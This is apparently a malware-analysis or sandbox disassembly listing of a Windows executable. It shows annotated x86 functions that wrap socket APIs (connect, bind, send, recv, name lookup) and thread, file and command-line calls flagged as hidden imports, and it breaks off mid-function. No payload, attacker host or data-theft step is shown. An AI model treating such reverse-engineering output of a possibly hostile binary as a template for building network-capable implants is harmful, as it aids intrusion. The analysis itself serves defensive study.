00407842 call 0040610Ch CreateFileA@KERNEL32.DLL (Hidden Import)
00407847 pop edi xrefs 00407806, 00407813
00407848 pop esi
00407849 pop ebx
0040784A ret function end
Function 004144AC, API count: 5, instr count: 147
APIs
  • inet_addr.WS2_32, ref: 004144FB
  • gethostbyaddr.WS2_32, ref: 0041452E
  • getaddrinfo.WS2_32, ref: 004145AA
  • getnameinfo.WS2_32, ref: 004145FC
  • FreeAddrInfoW.WS2_32, ref: 0041462E
Address Instruction Meta Information
004144AC push ebp xrefs 004199EC
004144AD mov ebp, esp
004144AF add esp, FFFFFFCCh
004144B2 push ebx
004144B3 push esi
004144B4 push edi
004144B5 xor ebx, ebx
004144B7 mov dword ptr [ebp-0Ch], ebx
004144BA mov dword ptr [ebp-10h], ebx
004144BD mov edi, ecx
004144BF mov esi, edx
004144C1 mov dword ptr [ebp-04h], eax
004144C4 mov ebx, dword ptr [ebp+08h]
004144C7 mov eax, dword ptr [ebp-04h]
004144CA call 00404868h
004144CF xor eax, eax
004144D1 push ebp
004144D2 push 0041465Fh
004144D7 push dword ptr fs:[eax]
004144DA mov dword ptr fs:[eax], esp
004144DD mov eax, ebx
004144DF mov edx, dword ptr [ebp-04h]
004144E2 call 00404430h
004144E7 mov eax, esi
004144E9 call 00413B74h
004144EE test al, al
004144F0 jne 00414562h
004144F2 mov eax, dword ptr [ebp-04h]
004144F5 call 00404878h
004144FA push eax
004144FB call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
00414501 mov dword ptr [ebp-14h], eax
00414504 cmp dword ptr [ebp-14h], FFFFFFFFh
00414508 je 0041463Ch
0041450E mov eax, dword ptr [0042C8A4h] 00960A4C
00414513 call 00413914h
00414518 xor eax, eax
0041451A push ebp
0041451B push 0041455Bh
00414520 push dword ptr fs:[eax]
00414523 mov dword ptr fs:[eax], esp
00414526 push 00000002h
00414528 push 00000004h
0041452A lea eax, dword ptr [ebp-14h]
0041452D push eax
0041452E call dword ptr [0042B3E8h] gethostbyaddr@WS2_32.DLL (Hidden Import)
00414534 mov esi, eax
00414536 test esi, esi
00414538 je 00414543h
0041453A mov eax, ebx
0041453C mov edx, dword ptr [esi]
0041453E call 004045D4h
00414543 xor eax, eax xrefs 00414538
00414545 pop edx
00414547 pop ecx Count = 2
00414548 mov dword ptr fs:[eax], edx
0041454B push 0041463Ch
00414550 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414560
00414555 call 0041391Ch
0041455A ret function end
00414562 xor eax, eax xrefs 004144F0
00414564 mov dword ptr [ebp-08h], eax
00414567 xor edx, edx
00414569 push ebp
0041456A push 00414635h
0041456F push dword ptr fs:[edx]
00414572 mov dword ptr fs:[edx], esp
00414575 lea eax, dword ptr [ebp-34h]
00414578 xor ecx, ecx
0041457A mov edx, 00000020h
0041457F call 00403030h
00414584 xor eax, eax
00414586 mov dword ptr [ebp-30h], eax
00414589 mov eax, dword ptr [ebp+0Ch]
0041458C mov dword ptr [ebp-2Ch], eax
0041458F mov dword ptr [ebp-28h], edi
00414592 xor eax, eax
00414594 mov dword ptr [ebp-34h], eax
00414597 lea eax, dword ptr [ebp-08h]
0041459A push eax
0041459B lea eax, dword ptr [ebp-34h]
0041459E push eax
0041459F push 00000000h
004145A1 mov eax, dword ptr [ebp-04h]
004145A4 call 00404878h
004145A9 push eax
004145AA call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
004145B0 test eax, eax
004145B2 jne 00414617h
004145B4 cmp dword ptr [ebp-08h], 00000000h
004145B8 je 00414617h
004145BA mov esi, 00000401h
004145BF mov edi, 00000020h
004145C4 lea eax, dword ptr [ebp-0Ch]
004145C7 mov edx, esi
004145C9 call 004049A8h
004145CE lea eax, dword ptr [ebp-10h]
004145D1 mov edx, edi
004145D3 call 004049A8h
004145D8 push 00000008h
004145DA push edi
004145DB mov eax, dword ptr [ebp-10h]
004145DE call 00404878h
004145E3 push eax
004145E4 push esi
004145E5 mov eax, dword ptr [ebp-0Ch]
004145E8 call 00404878h
004145ED push eax
004145EE mov eax, dword ptr [ebp-08h]
004145F1 mov eax, dword ptr [eax+10h]
004145F4 push eax
004145F5 mov eax, dword ptr [ebp-08h]
004145F8 mov eax, dword ptr [eax+18h]
004145FB push eax
004145FC call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
00414602 test eax, eax
00414604 jne 00414617h
00414606 mov eax, dword ptr [ebp-0Ch]
00414609 call 00404878h
0041460E mov edx, eax
00414610 mov eax, ebx
00414612 call 004045D4h
00414617 xor eax, eax xrefs 004145B2, 004145B8, 00414604
00414619 pop edx
0041461B pop ecx Count = 2
0041461C mov dword ptr fs:[eax], edx
0041461F push 0041463Ch
00414624 cmp dword ptr [ebp-08h], 00000000h xrefs 0041463A
00414628 je 00414634h
0041462A mov eax, dword ptr [ebp-08h]
0041462D push eax
0041462E call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414634 ret xrefs 00414628 function end
0041463C xor eax, eax xrefs 00414508
0041463E pop edx
00414640 pop ecx Count = 2
00414641 mov dword ptr fs:[eax], edx
00414644 push 00414666h
00414649 lea eax, dword ptr [ebp-10h] xrefs 00414664
0041464C mov edx, 00000002h
00414651 call 00404400h
00414656 lea eax, dword ptr [ebp-04h]
00414659 call 004043DCh
0041465E ret function end
Function 00412ED8, API count: 1, instr count: 6
APIs
  • CloseHandle.KERNEL32, ref: 00412EE8
Address Instruction Meta Information
00412ED8 push 0042C860h xrefs 004136B1
00412EDD call 00406114h
00412EE2 mov eax, dword ptr [0042C848h] 00000048
00412EE7 push eax
00412EE8 call 004060ECh CloseHandle@KERNEL32.DLL (Hidden Import)
00412EED ret function end
Function 004029BC, API count: 1, instr count: 37
APIs
  • GetCommandLineA.KERNEL32, ref: 004029F2
Address Instruction Meta Information
004029BC push ebx xrefs 00429EAD
004029BD push esi
004029BE push edi
004029BF add esp, FFFFFEF8h
004029C5 mov ebx, edx
004029C7 mov esi, eax
004029C9 mov eax, ebx
004029CB call 004043DCh
004029D0 test esi, esi
004029D2 jne 004029F2h
004029D4 push 00000105h
004029D9 lea eax, dword ptr [esp+04h]
004029DD push eax
004029DE push 00000000h
004029E0 call 00401258h
004029E5 mov ecx, eax
004029E7 mov edx, esp
004029E9 mov eax, ebx
004029EB call 004044CCh
004029F0 jmp 00402A10h
004029F2 call 00401240h GetCommandLineA@KERNEL32.DLL (Hidden Import) xrefs 004029D2
004029F7 mov edi, eax
004029F9 mov edx, ebx xrefs 00402A0E
004029FB mov eax, edi
004029FD call 004028D0h
00402A02 mov edi, eax
00402A04 test esi, esi
00402A06 je 00402A10h
00402A08 cmp dword ptr [ebx], 00000000h
00402A0B je 00402A10h
00402A0D dec esi
00402A0E jmp 004029F9h
00402A10 add esp, 00000108h xrefs 00402A06, 00402A0B, 004029F0
00402A16 pop edi
00402A17 pop esi
00402A18 pop ebx
00402A19 ret function end
Function 004073AC, API count: 1, instr count: 23
APIs
  • CompareStringA.KERNEL32, ref: 004073D9
Address Instruction Meta Information
004073AC push ebx xrefs 004073EE, 0040990F, 00409D7F, 00409DA9, 004118BC, 00411F24
004073AD push esi
004073AE mov esi, edx
004073B0 mov ebx, eax
004073B2 mov eax, esi
004073B4 call 00404678h
004073B9 push eax
004073BA mov eax, esi
004073BC call 00404878h
004073C1 push eax
004073C2 mov eax, ebx
004073C4 call 00404678h
004073C9 push eax
004073CA mov eax, ebx
004073CC call 00404878h
004073D1 push eax
004073D2 push 00000001h
004073D4 push 00000400h
004073D9 call 004060F4h CompareStringA@KERNEL32.DLL (Hidden Import)
004073DE sub eax, 02h
004073E1 pop esi
004073E2 pop ebx
004073E3 ret function end
Function 00413778, API count: 1, instr count: 3
APIs
  • Sleep.KERNEL32, ref: 00413779
Address Instruction Meta Information
00413778 push eax xrefs 00418672, 00418696, 004196E8, 00418D63
00413779 call 0040628Ch Sleep@KERNEL32.DLL (Hidden Import)
0041377E ret function end
Function 004139F4, API count: 1, instr count: 13
APIs
  • connect.WS2_32, ref: 00413A04
Address Instruction Meta Information
004139F4 push ebx xrefs 00418520
004139F5 push esi
004139F6 mov ebx, edx
004139F8 mov esi, eax
004139FA mov eax, ebx
004139FC call 0041399Ch
00413A01 push eax
00413A02 push ebx
00413A03 push esi
00413A04 call dword ptr [0042B434h] connect@WS2_32.DLL (Hidden Import)
00413A0A pop esi
00413A0B pop ebx
00413A0C ret function end
Function 0041C7E8, API count: 0, instr count: 20
Address Instruction Meta Information
0041C7E8 push ebp
0041C7E9 mov ebp, esp
0041C7EB xor eax, eax
0041C7ED push ebp
0041C7EE push 0041C81Dh
0041C7F3 push dword ptr fs:[eax]
0041C7F6 mov dword ptr fs:[eax], esp
0041C7F9 inc dword ptr [0042C8F0h]
0041C7FF jne 0041C80Fh
0041C801 mov eax, dword ptr [0042B858h] 0042B3CC
0041C806 mov eax, dword ptr [eax]
0041C808 call eax
0041C80A call 00414C90h
0041C80F xor eax, eax xrefs 0041C7FF
0041C811 pop edx
0041C813 pop ecx Count = 2
0041C814 mov dword ptr fs:[eax], edx
0041C817 push 0041C824h
0041C81C ret function end
Function 0040F3C8, API count: 2, instr count: 64
APIs
  • RtlEnterCriticalSection.NTDLL, ref: 0040F3FE
  • RtlLeaveCriticalSection.NTDLL, ref: 0040F46A
Address Instruction Meta Information
0040F3C8 push ebp xrefs 0040EFE7, 0040DAE6, 0040DE08, 0040E0F9, 0040E7F0, 0040F1F3, 0040F1AB
0040F3C9 mov ebp, esp
0040F3CB push ecx
0040F3CC push ebx
0040F3CD push esi
0040F3CE push edi
0040F3CF mov esi, edx
0040F3D1 mov ebx, eax
0040F3D3 cmp dword ptr [0042C81Ch], 00000000h
0040F3DA je 0040F3EAh
0040F3DC cmp bx, 0100h
0040F3E1 jc 0040F3EAh
0040F3E3 cmp bx, 07FFh
0040F3E8 jbe 0040F3EEh
0040F3EA xor eax, eax xrefs 0040F3DA, 0040F3E1
0040F3EC jmp 0040F3F0h
0040F3EE mov al, 01h xrefs 0040F3E8
0040F3F0 mov byte ptr [ebp-01h], al xrefs 0040F3EC
0040F3F3 cmp byte ptr [ebp-01h], 00000000h
0040F3F7 je 0040F477h
0040F3F9 push 0042C820h
0040F3FE call 0040611Ch RtlEnterCriticalSection@NTDLL.DLL (Hidden Import)
0040F403 xor eax, eax
0040F405 push ebp
0040F406 push 0040F470h
0040F40B push dword ptr fs:[eax]
0040F40E mov dword ptr fs:[eax], esp
0040F411 mov eax, dword ptr [0042C81Ch] 00000000
0040F416 call 0040508Ch
0040F41B movzx edi, bx
0040F41E mov edx, edi
0040F420 sub edx, 00000100h
0040F426 cmp eax, edx
0040F428 setnle byte ptr [ebp-01h]
0040F42C cmp byte ptr [ebp-01h], 00000000h
0040F430 je 0040F458h
0040F432 mov eax, dword ptr [0042C81Ch] 00000000
0040F437 mov eax, dword ptr [eax+edi*4-00000400h]
0040F43E mov dword ptr [esi], eax
0040F440 cmp dword ptr [esi], 00000000h
0040F443 je 0040F44Fh
0040F445 mov eax, dword ptr [esi]
0040F447 cmp eax, dword ptr [0042B344h] FFFFFFFF
0040F44D jne 0040F453h
0040F44F xor eax, eax xrefs 0040F443
0040F451 jmp 0040F455h
0040F453 mov al, 01h xrefs 0040F44D
0040F455 mov byte ptr [ebp-01h], al xrefs 0040F451
0040F458 xor eax, eax xrefs 0040F430
0040F45A pop edx
0040F45C pop ecx Count = 2
0040F45D mov dword ptr fs:[eax], edx
0040F460 push 0040F477h
0040F465 push 0042C820h xrefs 0040F475
0040F46A call 0040623Ch RtlLeaveCriticalSection@NTDLL.DLL (Hidden Import)
0040F46F ret function end
0040F477 mov al, byte ptr [ebp-01h] xrefs 0040F3F7
0040F47A pop edi
0040F47B pop esi
0040F47C pop ebx
0040F47D pop ecx
0040F47E pop ebp
0040F47F ret function end
Function 00407978, API count: 0, instr count: 8
Address Instruction Meta Information
00407978 push ebx xrefs 00422000, 00429E90
00407979 mov ebx, eax
0040797B mov eax, ebx
0040797D call 00407910h
00407982 inc eax
00407983 setne al
00407986 pop ebx
00407987 ret function end
Function 00407A4C, API count: 1, instr count: 49
APIs
  • GetDiskFreeSpaceA.KERNEL32, ref: 00407A6D
Address Instruction Meta Information
00407A4C push ebp
00407A4D mov ebp, esp
00407A4F add esp, FFFFFFE8h
00407A52 push ebx
00407A53 mov eax, dword ptr [ebp+08h]
00407A56 test eax, eax
00407A58 jne 00407A5Ch
00407A5A xor eax, eax
00407A5C lea edx, dword ptr [ebp-10h] xrefs 00407A58
00407A5F push edx
00407A60 lea edx, dword ptr [ebp-0Ch]
00407A63 push edx
00407A64 lea edx, dword ptr [ebp-08h]
00407A67 push edx
00407A68 lea edx, dword ptr [ebp-04h]
00407A6B push edx
00407A6C push eax
00407A6D call 00406194h GetDiskFreeSpaceA@KERNEL32.DLL (Hidden Import)
00407A72 mov ebx, eax
00407A74 mov eax, dword ptr [ebp-04h]
00407A77 imul dword ptr [ebp-08h]
00407A7A xor edx, edx
00407A7C mov dword ptr [ebp-18h], eax
00407A7F mov dword ptr [ebp-14h], edx
00407A82 mov eax, dword ptr [ebp-0Ch]
00407A85 xor edx, edx
00407A87 push edx
00407A88 push eax
00407A89 mov eax, dword ptr [ebp-18h]
00407A8C mov edx, dword ptr [ebp-14h]
00407A8F call 00405068h
00407A94 mov ecx, dword ptr [ebp+0Ch]
00407A97 mov dword ptr [ecx], eax
00407A99 mov dword ptr [ecx+04h], edx
00407A9C mov eax, dword ptr [ebp-10h]
00407A9F xor edx, edx
00407AA1 push edx
00407AA2 push eax
00407AA3 mov eax, dword ptr [ebp-18h]
00407AA6 mov edx, dword ptr [ebp-14h]
00407AA9 call 00405068h
00407AAE mov ecx, dword ptr [ebp+10h]
00407AB1 mov dword ptr [ecx], eax
00407AB3 mov dword ptr [ecx+04h], edx
00407AB6 mov eax, ebx
00407AB8 pop ebx
00407AB9 mov esp, ebp
00407ABB pop ebp
00407ABC retn 0010h function end
Function 00413AD8, API count: 1, instr count: 12
APIs
  • send.WS2_32, ref: 00413AE3
Address Instruction Meta Information
00413AD8 push ebp xrefs 004187BD, 004187FA
00413AD9 mov ebp, esp
00413ADB push ebx
00413ADC mov ebx, dword ptr [ebp+08h]
00413ADF push ebx
00413AE0 push ecx
00413AE1 push edx
00413AE2 push eax
00413AE3 call dword ptr [0042B400h] send@WS2_32.DLL (Hidden Import)
00413AE9 pop ebx
00413AEA pop ebp
00413AEB retn 0004h function end
Function 0040F480, API count: 1, instr count: 30
APIs
  • RtlDeleteCriticalSection.NTDLL, ref: 0040F4A3
Address Instruction Meta Information
0040F480 push ebp
0040F481 mov ebp, esp
0040F483 xor eax, eax
0040F485 push ebp
0040F486 push 0040F4EFh
0040F48B push dword ptr fs:[eax]
0040F48E mov dword ptr fs:[eax], esp
0040F491 inc dword ptr [0042C818h]
0040F497 jne 0040F4E1h
0040F499 call 0040F124h
0040F49E push 0042C820h
0040F4A3 call 00406114h RtlDeleteCriticalSection@NTDLL.DLL (Hidden Import)
0040F4A8 mov eax, 0042C81Ch
0040F4AD mov edx, dword ptr [0040F100h] 0040F104
0040F4B3 call 00405254h
0040F4B8 mov eax, 0042B348h
0040F4BD mov ecx, 00000015h
0040F4C2 mov edx, dword ptr [00401040h] 00401044
0040F4C8 call 00404D40h
0040F4CD mov eax, 0042B33Ch
0040F4D2 call 004043DCh
0040F4D7 mov eax, 0042C7F8h
0040F4DC call 0040DB20h
0040F4E1 xor eax, eax xrefs 0040F497
0040F4E3 pop edx
0040F4E5 pop ecx Count = 2
0040F4E6 mov dword ptr fs:[eax], edx
0040F4E9 push 0040F4F6h
0040F4EE ret xrefs 0040F4F4 function end
Function 00421A91, API count: 0, instr count: 9
Strings
  • p B, va: 00420924
Address Instruction Meta Information
00421A91 sub eax, 0042CA94h
00421A96 add dword ptr [ebx+16h], esi
00421A99 call 0041F43Ch
00421A9E test al, al
00421AA0 je 00421AAFh
00421AA2 mov eax, dword ptr [0042B97Ch] 0042B5D8
00421AA7 mov edx, dword ptr [00420924h] ASCII "p B"
00421AAD mov dword ptr [eax], edx
00421AAF ret xrefs 00421AA0 function end
Function 00404390, API count: 1, instr count: 29
APIs
  • CreateThread.KERNEL32, ref: 004043C6
Address Instruction Meta Information
00404390 push ebp xrefs 004131D6
00404391 mov ebp, esp
00404393 push ebx
00404394 push esi
00404395 push edi
00404396 mov edi, ecx
00404398 mov esi, edx
0040439A mov ebx, eax
0040439C mov eax, 00000008h
004043A1 call 004026C8h
004043A6 mov dword ptr [eax], edi
004043A8 mov edx, dword ptr [ebp+10h]
004043AB mov dword ptr [eax+04h], edx
004043AE mov byte ptr [0042C045h], 00000001h
004043B5 mov edx, dword ptr [ebp+08h]
004043B8 push edx
004043B9 mov edx, dword ptr [ebp+0Ch]
004043BC push edx
004043BD push eax
004043BE mov eax, 00404358h
004043C3 push eax
004043C4 push esi
004043C5 push ebx
004043C6 call 00401208h CreateThread@KERNEL32.DLL (Hidden Import)
004043CB pop edi
004043CC pop esi
004043CD pop ebx
004043CE pop ebp
004043CF retn 000Ch function end
Function 00402DA8, API count: 1, instr count: 60
APIs
  • RtlGetLastWin32Error.NTDLL, ref: 00402DD9
Address Instruction Meta Information
00402DA8 push ebp xrefs 00402E48, 00402E68
00402DA9 mov ebp, esp
00402DAB push ecx
00402DAC push ebx
00402DAD push esi
00402DAE push edi
00402DAF mov esi, ecx
00402DB1 mov edi, edx
00402DB3 mov ebx, eax
00402DB5 mov eax, dword ptr [ebp+10h]
00402DB8 movzx edx, word ptr [ebx+04h]
00402DBC and edx, eax
00402DBE cmp eax, edx
00402DC0 jne 00402E1Ah
00402DC2 push 00000000h
00402DC4 lea eax, dword ptr [ebp-04h]
00402DC7 push eax
00402DC8 mov eax, dword ptr [ebx+08h]
00402DCB imul esi
00402DCD push eax
00402DCE push edi
00402DCF mov eax, dword ptr [ebx]
00402DD1 push eax
00402DD2 call dword ptr [ebp+0Ch]
00402DD5 test eax, eax
00402DD7 jne 00402DEAh
00402DD9 call 00401248h RtlGetLastWin32Error@NTDLL.DLL (Hidden Import)
00402DDE call 00402810h
00402DE3 xor eax, eax
00402DE5 mov dword ptr [ebp-04h], eax
00402DE8 jmp 00402E29h
00402DEA mov eax, dword ptr [ebp-04h] xrefs 00402DD7
00402DED xor edx, edx
00402DEF div dword ptr [ebx+08h]
00402DF2 mov dword ptr [ebp-04h], eax
00402DF5 mov eax, dword ptr [ebp+14h]
00402DF8 test eax, eax
00402DFA je 00402E06h
00402DFC mov eax, dword ptr [ebp+14h]
00402DFF mov edx, dword ptr [ebp-04h]
00402E02 mov dword ptr [eax], edx
00402E04 jmp 00402E29h
00402E06 cmp esi, dword ptr [ebp-04h] xrefs 00402DFA
00402E09 je 00402E29h
00402E0B mov eax, dword ptr [ebp+08h]
00402E0E call 00402810h
00402E13 xor eax, eax
00402E15 mov dword ptr [ebp-04h], eax
00402E18 jmp 00402E29h
00402E1A mov eax, 00000067h xrefs 00402DC0
00402E1F call 00402810h
00402E24 xor eax, eax
00402E26 mov dword ptr [ebp-04h], eax
00402E29 mov eax, dword ptr [ebp-04h] xrefs 00402E09, 00402E18, 00402E04, 00402DE8
00402E2C pop edi
00402E2D pop esi
00402E2E pop ebx
00402E2F pop ecx
00402E30 pop ebp
00402E31 retn 0010h function end
Function 004139D8, API count: 1, instr count: 13
APIs
  • bind.WS2_32, ref: 004139E8
Address Instruction Meta Information
004139D8 push ebx xrefs 0041840F
004139D9 push esi
004139DA mov ebx, edx
004139DC mov esi, eax
004139DE mov eax, ebx
004139E0 call 0041399Ch
004139E5 push eax
004139E6 push ebx
004139E7 push esi
004139E8 call dword ptr [0042B43Ch] bind@WS2_32.DLL (Hidden Import)
004139EE pop esi
004139EF pop ebx
004139F0 ret function end
Function 004044FC, API count: 1, instr count: 15
APIs
  • WideCharToMultiByte.KERNEL32, ref: 00404512
Address Instruction Meta Information
004044FC push ebp xrefs 004045A3, 00404573
004044FD mov ebp, esp
00404501 push 00000000h Count = 2
00404503 push edx
00404504 push eax
00404505 mov eax, dword ptr [ebp+08h]
00404508 push eax
00404509 push ecx
0040450A push 00000000h
0040450C mov eax, dword ptr [0042C5B8h] 00000003
00404511 push eax
00404512 call 004012C0h WideCharToMultiByte@KERNEL32.DLL (Hidden Import)
00404517 pop ebp
00404518 retn 0004h function end
Function 00413AF0, API count: 1, instr count: 12
APIs
  • recv.WS2_32, ref: 00413AFB
Address Instruction Meta Information
00413AF0 push ebp xrefs 00418B17, 004193F4
00413AF1 mov ebp, esp
00413AF3 push ebx
00413AF4 mov ebx, dword ptr [ebp+08h]
00413AF7 push ebx
00413AF8 push ecx
00413AF9 push edx
00413AFA push eax
00413AFB call dword ptr [0042B404h] recv@WS2_32.DLL (Hidden Import)
00413B01 pop ebx
00413B02 pop ebp
00413B03 retn 0004h function end
Function 0041351C, API count: 3, instr count: 59
APIs
    • InterlockedExchange.KERNEL32, ref: 00412FB7
  • PeekMessageA.USER32, ref: 00413556
  • MsgWaitForMultipleObjects.USER32, ref: 0041356B
  • GetExitCodeThread.KERNEL32, ref: 004135A3
Address Instruction Meta Information
0041351C push ebx xrefs 0042254E, 00413281
0041351D push esi
0041351E add esp, FFFFFFD8h
00413521 mov esi, eax
00413523 mov eax, dword ptr [esi+04h]
00413526 mov dword ptr [esp+04h], eax
0041352A call 00406184h
0041352F mov edx, dword ptr [0042B984h] 0042C030
00413535 cmp eax, dword ptr [edx]
00413537 jne 00413591h
00413539 xor ebx, ebx
0041353B mov eax, dword ptr [0042C848h] 00000048
00413540 mov dword ptr [esp+08h], eax
00413544 cmp ebx, 02h xrefs 0041358D
00413547 jne 0041355Bh
0041354F push 00000000h Count = 4
00413551 lea eax, dword ptr [esp+1Ch]
00413555 push eax
00413556 call 004062DCh PeekMessageA@USER32.DLL (Hidden Import)
0041355B push 00000040h xrefs 00413547
0041355D push 000003E8h
00413562 push 00000000h
00413564 lea eax, dword ptr [esp+10h]
00413568 push eax
00413569 push 00000002h
0041356B call 004062D4h MsgWaitForMultipleObjects@USER32.DLL (Hidden Import)
00413570 mov ebx, eax
00413572 cmp ebx, FFFFFFFFh
00413575 setne dl
00413578 mov eax, esi
0041357A call 00413344h
0041357F cmp ebx, 01h
00413582 jne 0041358Bh
00413584 xor eax, eax
00413586 call 00412F3Ch
0041358B test ebx, ebx xrefs 00413582
0041358D jne 00413544h
0041358F jmp 0041359Dh
00413591 push FFFFFFFFh xrefs 00413537
00413593 mov eax, dword ptr [esp+08h]
00413597 push eax
00413598 call 0040629Ch
0041359D push esp xrefs 0041358F
0041359E mov eax, dword ptr [esp+08h]
004135A2 push eax
004135A3 call 0040619Ch GetExitCodeThread@KERNEL32.DLL (Hidden Import)
004135A8 cmp eax, 01h
004135AB sbb edx, edx
004135AD inc edx
004135AE mov eax, esi
004135B0 call 00413344h
004135B5 mov eax, dword ptr [esp]
004135B8 add esp, 28h
004135BB pop esi
004135BC pop ebx
004135BD ret function end
Function 00402F94, API count: 1, instr count: 31
APIs
  • SetFilePointer.KERNEL32, ref: 00402FB1
Address Instruction Meta Information
00402F94 push ebx xrefs 00402F7E
00402F95 push esi
00402F96 mov ebx, eax
00402F98 mov ax, word ptr [ebx+04h]
00402F9C cmp ax, 0000D7B0h
00402FA0 jbe 00402FCFh
00402FA2 cmp ax, 0000D7B3h
00402FA6 jnbe 00402FCFh
00402FA8 push 00000001h
00402FAC push 00000000h Count = 2
00402FAE mov eax, dword ptr [ebx]
00402FB0 push eax
00402FB1 call 004011E8h SetFilePointer@KERNEL32.DLL (Hidden Import)
00402FB6 mov esi, eax
00402FB8 cmp esi, FFFFFFFFh
00402FBB jne 00402FC4h
00402FBD call 00402820h
00402FC2 jmp 00402FDCh
00402FC4 mov eax, esi xrefs 00402FBB
00402FC6 xor edx, edx
00402FC8 div dword ptr [ebx+08h]
00402FCB mov esi, eax
00402FCD jmp 00402FDCh
00402FCF mov eax, 00000067h xrefs 00402FA0, 00402FA6
00402FD4 call 00402810h
00402FD9 or esi, FFFFFFFFh
00402FDC mov eax, esi xrefs 00402FCD, 00402FC2
00402FDE pop esi
00402FDF pop ebx
00402FE0 ret function end
Function 004052B8, API count: 1, instr count: 13
APIs
  • VirtualQuery.KERNEL32, ref: 004052C3
Address Instruction Meta Information
004052B8 add esp, FFFFFFE4h xrefs 00410318
004052BB push 0000001Ch
004052BD lea edx, dword ptr [esp+04h]
004052C1 push edx
004052C2 push eax
004052C3 call 004012C8h VirtualQuery@KERNEL32.DLL (Hidden Import)
004052C8 cmp dword ptr [esp+10h], 00001000h
004052D0 jne 004052D8h
004052D2 mov eax, dword ptr [esp+04h]
004052D6 jmp 004052DAh
004052D8 xor eax, eax xrefs 004052D0
004052DA add esp, 1Ch xrefs 004052D6
004052DD ret function end
Function 00413384, API count: 1, instr count: 73
APIs
    • SetEvent.KERNEL32, ref: 00412F1E
  • CreateEventA.KERNEL32, ref: 004133B3
Address Instruction Meta Information
00413384 push ebp xrefs 004134E0
00413385 mov ebp, esp
00413387 add esp, FFFFFFF4h
0041338A push ebx
0041338B mov dword ptr [ebp-04h], edx
0041338E call 00406184h
00413393 mov edx, dword ptr [0042B984h] 0042C030
00413399 cmp eax, dword ptr [edx]
0041339B jne 004133ABh
0041339D mov ebx, dword ptr [ebp-04h]
004133A0 mov eax, dword ptr [ebx+0Ch]
004133A3 call dword ptr [ebx+08h]
004133A6 jmp 004134BEh
004133AD push 00000000h Count = 2
004133AF push FFFFFFFFh
004133B1 push 00000000h
004133B3 call 00406104h CreateEventA@KERNEL32.DLL (Hidden Import)
004133B8 mov dword ptr [ebp-08h], eax
004133BB xor eax, eax
004133BD push ebp
004133BE push 004134A6h
004133C3 push dword ptr fs:[eax]
004133C6 mov dword ptr fs:[eax], esp
004133C9 push 0042C860h
004133CE call 0040611Ch
004133D3 xor eax, eax
004133D5 push ebp
004133D6 push 00413488h
004133DB push dword ptr fs:[eax]
004133DE mov dword ptr fs:[eax], esp
004133E1 cmp dword ptr [0042B3C4h], 00000000h
004133E8 jne 004133FBh
004133EA mov dl, 01h
004133EC mov eax, dword ptr [0040FA48h] 0040FA94
004133F1 call 004036D8h
004133F6 mov dword ptr [0042B3C4h], eax
004133FB mov eax, dword ptr [ebp-04h] xrefs 004133E8
004133FE mov dword ptr [ebp-0Ch], eax
00413401 lea edx, dword ptr [ebp-0Ch]
00413404 mov eax, dword ptr [0042B3C4h] 00000000
00413409 call 00410574h
0041340E call 00412F18h
00413413 cmp word ptr [0042B3BEh], 0000h
0041341B je 0041342Eh
0041341D mov eax, dword ptr [ebp-0Ch]
00413420 mov edx, dword ptr [eax]
00413422 mov eax, dword ptr [0042B3C0h] 00000000
00413428 call dword ptr [0042B3BCh]
0041342E push 0042C860h xrefs 0041341B
00413433 call 0040623Ch
00413438 xor eax, eax
0041343A push ebp
0041343B push 00413469h
00413440 push dword ptr fs:[eax]
00413443 mov dword ptr fs:[eax], esp
00413446 push FFFFFFFFh
00413448 mov eax, dword ptr [ebp-08h]
0041344B push eax
0041344C call 0040629Ch
00413451 xor eax, eax
00413453 pop edx
00413455 pop ecx Count = 2
00413456 mov dword ptr fs:[eax], edx
00413459 push 00413470h
0041345E push 0042C860h xrefs 0041346E
00413463 call 0040611Ch
00413468 ret function end
004134BE pop ebx xrefs 004133A6, 004134B5
004134BF mov esp, ebp
004134C1 pop ebp
004134C2 ret function end
Function 00405350, API count: 1, instr count: 9
APIs
  • CharNextA.USER32, ref: 00405353
Address Instruction Meta Information
00405350 jmp 00405358h xrefs 00405433, 004053E7, 004053FA
00405352 push eax xrefs 00405361
00405353 call 00401200h CharNextA@USER32.DLL (Import)
00405358 mov dl, byte ptr [eax] xrefs 00405350
0040535A test dl, dl
0040535C je 00405363h
0040535E cmp dl, 0000005Ch
00405361 jne 00405352h
00405363 ret xrefs 0040535C function end
Function 00413F58, API count: 2, instr count: 74
APIs
  • inet_ntoa.WS2_32, ref: 00413F9C
  • getnameinfo.WS2_32, ref: 00413FF4
Address Instruction Meta Information
00413F58 push ebp xrefs 004181AA
00413F59 mov ebp, esp
00413F5B add esp, FFFFFFDCh
00413F5E push ebx
00413F5F push esi
00413F60 push edi
00413F61 xor ecx, ecx
00413F63 mov dword ptr [ebp-04h], ecx
00413F66 mov dword ptr [ebp-08h], ecx
00413F69 mov esi, eax
00413F6B lea edi, dword ptr [ebp-24h]
00413F6E mov ecx, 00000007h
00413F73 rep movsd
00413F75 mov edi, edx
00413F77 xor eax, eax
00413F79 push ebp
00413F7A push 0041402Ah
00413F7F push dword ptr fs:[eax]
00413F82 mov dword ptr fs:[eax], esp
00413F85 mov eax, edi
00413F87 call 004043DCh
00413F8C movzx eax, word ptr [ebp-24h]
00413F90 call 00413B74h
00413F95 test al, al
00413F97 jne 00413FB3h
00413F99 push dword ptr [ebp-20h]
00413F9C call dword ptr [0042B41Ch] inet_ntoa@WS2_32.DLL (Hidden Import)
00413FA2 mov ebx, eax
00413FA4 test ebx, ebx
00413FA6 je 0041400Fh
00413FA8 mov eax, edi
00413FAA mov edx, ebx
00413FAC call 004045D4h
00413FB1 jmp 0041400Fh
00413FB3 mov ebx, 00000401h xrefs 00413F97
00413FB8 mov esi, 00000020h
00413FBD lea eax, dword ptr [ebp-04h]
00413FC0 mov edx, ebx
00413FC2 call 004049A8h
00413FC7 lea eax, dword ptr [ebp-08h]
00413FCA mov edx, esi
00413FCC call 004049A8h
00413FD1 push 0000000Ah
00413FD3 push esi
00413FD4 mov eax, dword ptr [ebp-08h]
00413FD7 call 00404878h
00413FDC push eax
00413FDD push ebx
00413FDE mov eax, dword ptr [ebp-04h]
00413FE1 call 00404878h
00413FE6 push eax
